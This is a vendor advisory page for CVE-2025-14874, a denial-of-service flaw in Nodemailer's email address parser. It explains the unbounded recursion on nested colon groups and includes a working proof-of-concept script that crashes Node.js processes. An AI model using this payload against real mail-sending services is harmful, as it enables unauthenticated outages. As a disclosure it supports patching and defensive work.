Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2025-14874 — advanced-cluster-management-for-kubernet

🟠 CVSS 8.0 — High ⚠️ Exploit Public CWE-703 NVD
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Nodemailer’s addressparser is vulnerable to DoS caused by recursive calls

Summary

A DoS can occur that immediately halts the system due to the use of an unsafe function.

Details

According to RFC 5322, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list.

However, the code implemented for this flattening process can be exploited by malicious input and triggers DoS

RFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group.

At the following location in lib/addressparser/index.js:

https://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90

there is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header:

``g0: g1: g2: g3: ... gN: [email protected];``

Because no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern

addressparser → _handleAddress → addressparser → ...

for each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service.

The problematic code section is as follows:

```js

if (isGroup) {

...

if (data.group.length) {

let parsedGroup = addressparser(data.group.join(',')); // <- boom!

parsedGroup.forEach(member => {

if (member.group) {

groupMembers = groupMembers.concat(member.group);

} else {

groupMembers.push(member);

}

});

}

}

```

data.group is expected to contain members separated by commas, but in the attacker’s payload the group contains colon (:) tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number.

PoC

```

const nodemailer = require('nodemailer');

function buildDeepGroup(depth) {

let parts = [];

for (let i = 0; i < depth; i++) {

parts.push(g${i}:);

}

return parts.join(' ') + ' [email protected];';

}

const DEPTH = 3000; // <- control depth

const toHeader = buildDeepGroup(DEPTH);

console.log('to header length:', toHeader.length);

const transporter = nodemailer.createTransport({

streamTransport: true,

buffer: true,

newline: 'unix'

});

console.log('parsing start');

transporter.sendMail(

{

from: '[email protected]',

to: toHeader,

subject: 'test',

text: 'test'

},

(err, info) => {

if (err) {

console.error('error:', err);

} else {

console.log('finished :', info && info.envelope);

}

}

);

```

As a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately.

Impact

The attacker can achieve the following:

1. Force an immediate crash of any server/service that uses Nodemailer

2. Kill the backend process with a single web request

3. In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion”

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity none, availability high.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Privileges required: None — an unauthenticated stranger can try it.
  • User interaction: None — nobody has to be tricked into anything.
  • Scope: Unchanged — the damage stays inside the vulnerable component.
  • Confidentiality impact: None.
  • Integrity impact: None.
  • Availability impact: High — total loss, or loss the attacker controls.

Weakness class

CVE-2025-14874 is classified as CWE-703: Improper Check or Handling of Exceptional Conditions. The product does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the product.

Affected software

CVE-2025-14874 is recorded against 5 packages.

  • advanced-cluster-management-for-kubernetes
  • ceph-storage
  • developer-hub
  • nodemailer
  • org.webjars.npm:nodemailer (from 3.0.0)

Timeline and source

Published on 18 December 2025 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from NVD.

References

access.redhat.com
bugzilla.redhat.com
github.com
github.com
github.com
bugzilla.redhat.com
github.com

Other advisories for this package

advanced-cluster-management-for-kubernetes has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-703: Improper Check or Handling of Exceptional Conditions) in other software:

CVE-2025-14874 on other distributions

Each distribution ships its own build and its own fixed version. Pick the one you run:

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE CWE-703
Public Exploit ⚠️ Yes
Source NVD
Published 2025-12-18
Updated 2026-08-20
Modified 2026-06-17

Affected Packages

Software From version Fixed in
advanced-cluster-management-for-kubernetes
ceph-storage
developer-hub
nodemailer
org.webjars.npm:nodemailer 3.0.0

Similar Threats

Exploit Protection

Are you running advanced-cluster-management-for-kubernet?

CVE-2025-14874 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2025-14874 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2025